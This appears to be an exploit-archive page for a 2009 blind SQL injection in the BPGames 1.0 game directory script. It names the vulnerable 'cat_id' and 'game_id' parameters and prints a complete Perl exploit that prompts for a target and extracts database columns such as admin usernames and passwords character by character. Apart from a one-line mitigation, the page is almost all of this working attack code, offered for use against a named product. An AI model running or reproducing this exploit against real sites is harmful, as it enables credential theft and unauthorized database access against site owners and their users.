header-logo
Suggest Exploit
vendor:
BPGames
by:
OoN_Boy
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: BPGames
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Related CWE: N/A
CPE: a:bpowerhouse:bpgames
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP, MySQL
2009

BPGames 1.0 blind SQL Injection Exploit

A blind SQL injection vulnerability exists in BPGames 1.0. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending malicious SQL queries to the vulnerable application through the 'cat_id' and 'game_id' parameters in the 'main.php' and 'game.php' files respectively.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#[x]===================================================================[x]
# |                     AntiSecurity[dot]org			     	|
#[x]===================================================================[x]
# | Title    		: BPGames 1.0 blind SQL Injection Exploit    	|
# | Software 		: BPGames				     	|
# | Vendor   		: http://bpowerhouse.info		     	|
# | Date    		: 22 September 2009 ( Indonesia )	     	|
# | Author   		: OoN_Boy					|
# | Contact  		: oon.boy9@gmail.com				|
# | Web	    		: http://oonboy.info				|
# | Blog     		: http://oonboy.blogspot.com			|
#[x]===================================================================[x]
# | Technology		: PHP                                           |
# | Database		: MySQL                                         |
# | Version		: 1.0                                           |
# | License		: GNU GPL                                       |
# | Price		: $29.90                                        |
# | Description		: is a game directory site script. The script	| 
# |			  supports multi-language settings. Site users	|
# |			  can search for games according to categories	|
#[x]===================================================================[x]
# | Google Dork 	: gwe ganteng :P				|
#[x]===================================================================[x]
# | Exploit 		: http://localhost/[path]/main.php?cat_id=[sql]	|
# |			  http://localhost/[path]/game.php?game_id=[sql]|
# | Aadmin Page		: http://localhost/[path]/admin/index.php	|
#[x]===================================================================[x]
# | Greetz		: antisecurity.org batamhacker.or.id            |
# |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
# |			  yooogy mousekill }^-^{ martfella noname s4va  |
# | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua	|
# |			  Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
#[x]===================================================================[x]


use HTTP::Request;
use LWP::UserAgent;

$cmsapp = 'BPGames';
$vuln   = 'main.php?cat_id=';   #change vuln game.php?game_id=
#vuln	= 'game.php?game_id=';
$string = 'Previous';		#change if any string
#string = 'Instrucciones';
$maxlen = 32;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
    $cmsapp
 [x]=================================================[x]
  |     BPGames 1.0 blind SQL Injection Exploit       |
 [x]=================================================[x]

\n";

print " [+] URL Path : "; chomp($web=<STDIN>);
print " [+] Valid ID : "; chomp($id=<STDIN>);
print " [+] Table    : "; chomp($table=<STDIN>);	#table name admins
print " [+] Columns  : "; chomp($columns=<STDIN>);	#column username and password

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Mission completed.\n\n";

sub get_data() {
	@columns = split(/,/, $columns);
	foreach $column (@columns) {
		print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
		syswrite(STDOUT, " [-] $table\@$column> ", 255);
		for (my $i=1; $i<=$maxlen; $i++) {
			my $chr = 0;
			my $found = 0;
			my $char = 48;
			while (!$chr && $char<=57) {
				if(exploit($i,$char) =~ /$string/) {
					$chr = 1;
					$found = 1;
					syswrite(STDOUT,chr($char),1);
				} else { $found = 0; }
				$char++;
			}
			if(!$chr) {
				$char = 97;
				while(!$chr && $char<=122) {
					if(exploit($i,$char) =~ /$string/) {
						$chr = 1;
						$found = 1;
						syswrite(STDOUT,chr($char),1);
					} else { $found = 0; }
					$char++;
				}
			}
			if (!$found) {
				print "\n"; last;
			}
		}
	}
}

sub exploit() {
	my $limit = $_[0];
	my $chars = $_[1];
	my $blind = '+AND+SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1)=CHAR('.$chars.')';
	my $inject = $target.$vuln.$id.$blind;
	my $content = get_content($inject);
	return $content;
}

sub get_content() {
	my $url = $_[0];
	my $req = HTTP::Request->new(GET => $url);
	my $ua  = LWP::UserAgent->new();
	$ua->timeout(5);
	my $res = $ua->request($req);
	if ($res->is_error){
		print "\n\n [!] Error, ".$res->status_line.".\n\n";
		exit;
	}
	return $res->content;
}

# Exploit End

Navigation

Suggest Exploit

Services By CQR